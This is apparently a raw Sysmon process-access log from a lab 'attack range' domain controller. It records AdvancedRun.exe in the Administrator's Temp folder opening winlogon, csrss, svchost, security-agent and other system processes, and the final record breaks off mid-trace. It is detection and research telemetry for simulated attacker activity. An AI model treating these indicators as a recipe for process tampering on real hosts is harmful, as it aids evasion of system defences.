20:16:35.048{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077880Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.048{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077879Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.048{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077878Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.048{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077877Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.048{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077876Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.047{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077875Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.047{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077874Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.047{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004077873Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.046{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077872Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.046{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077871Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.045{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077870Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.045{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077869Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.045{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077868Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.045{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077867Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.045{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|